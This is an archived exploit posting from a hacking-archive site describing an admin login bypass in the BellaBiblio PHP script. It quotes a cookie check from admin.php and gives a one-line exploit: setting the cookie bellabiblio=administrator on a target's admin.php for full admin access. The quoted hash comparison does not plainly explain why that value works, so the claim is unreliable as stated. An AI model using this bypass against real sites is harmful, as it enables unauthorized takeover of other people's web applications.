AOH :: HP Unsorted B :: TB11854.HTM

BellaBiblio Admin Login Bypass



BellaBiblio Admin Login Bypass
BellaBiblio Admin Login Bypass



BellaBiblio Admin Login Bypass

SCRIPT: BellaBiblio

DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip 

AUTHOR: ilker kandemir 

Bug in;(admin.php)
if (isset($_COOKIE['bellabiblio'])) {
    if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
        if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = "";

EXPLOIT:

Set your cookie: bellabiblio=administrator   http:/site.com/admin.php
And you have full admin access

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.